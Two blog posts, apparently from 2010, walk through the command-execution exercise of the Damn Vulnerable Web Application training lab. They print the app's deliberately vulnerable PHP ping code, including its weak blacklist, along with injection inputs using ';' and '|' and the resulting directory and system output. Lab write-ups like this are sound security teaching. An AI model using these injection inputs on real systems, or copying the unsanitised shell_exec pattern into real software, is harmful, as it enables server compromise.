Command Execution Part 2…

June 11, 2010 at 6:21 am (Command Execution, PHP, Security)

Hey guys,

So I finally got around to playing with the Damn Vulnerable Web Application on Medium level. The command execution level really only added a filter for two characters as a “more secure” version to the level on low setting. Lets take a look at the code:

<?php

if( isset( $_POST[ 'submit'] ) ) {

$target = $_REQUEST[ 'ip' ];

// Remove any of the charactars in the array (blacklist).
$substitutions = array(
‘&&’ => ”,
‘;’ => ”,
);

$target = str_replace( array_keys( $substitutions ), $substitutions, $target );

// Determine OS and execute the ping command.
if (stristr(php_uname(‘s’), ‘Windows NT’)) {

$cmd = shell_exec( ‘ping ‘ . $target );
echo ‘<pre>’.$cmd.’</pre>’;

} else {

$cmd = shell_exec( ‘ping -c 3 ‘ . $target );
echo ‘<pre>’.$cmd.’</pre>’;

}
}

?>

As you can see, they have added a character filter which filters out the following characters: ‘;’ and ‘&&’, the code that does this is here:

$substitutions = array(
'&&' => '',
';' => '',
);

Well what about the other plethora of bash commands ay? Such as.. well you guessed it the famous pipe operator: ‘|’. Lets see what happens when we try using it:

I entered: “127.0.0.1 | ls -l”, however you could just do: “| ls -l”, and I got returned:

total 12
drwxr-xr-x 2 www-data www-data 4096 Feb 17 15:17 help
-rw-r--r-- 1 www-data www-data 1509 Feb 17 15:17 index.php
-rw-r--r-- 1 www-data www-data 0 Jun 9 08:37 ls
drwxr-xr-x 2 www-data www-data 4096 Feb 17 15:17 source

Viola!

Permalink Leave a Comment

Command Execution Part 1

June 3, 2010 at 6:00 pm (Command Execution, PHP, Programming, Security)

Hey,

So the next part of the Damn Vulnerable Web Application is entitled “Command Execution”, which is a very very simple and contrived example, lets take a look at the source code behind it:

<?php

if( isset( $_POST[ 'submit' ] ) ) {

$target = $_REQUEST[ 'ip' ];

// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {

$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';

} else {

$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';

}

}
?>

So as you can see clear as day there is no sanitization used on the user defined $target variable, so the trick here is very simple:

127.0.0.1; ls -lart; uname -ar; whoami; who;

Will return:

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.080 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.241 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.241 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2011ms
rtt min/avg/max/mdev = 0.080/0.187/0.241/0.076 ms
total 20
drwxr-xr-x 2 www-data www-data 4096 Feb 17 15:17 source
-rw-r--r-- 1 www-data www-data 1509 Feb 17 15:17 index.php
drwxr-xr-x 2 www-data www-data 4096 Feb 17 15:17 help
drwxr-xr-x 10 www-data www-data 4096 Feb 17 15:17 ..
drwxr-xr-x 4 www-data www-data 4096 Jun 3 13:38 .
Linux dojo-vm 2.6.31-19-generic #56-Ubuntu SMP Thu Jan 28 01:26:53 UTC 2010 i686 GNU/Linux
www-data
dojo tty7 Jun 2 14:51 (:0)
dojo pts/0 Jun 2 15:50 (:0.0)
dojo pts/1 Jun 2 18:36 (:0.0)

Well that one was easy, wasn’t it? :-)

Also note that you can use && to concatenate commands on the command line as well as ;.

Permalink Leave a Comment

Follow

Get every new post delivered to your Inbox.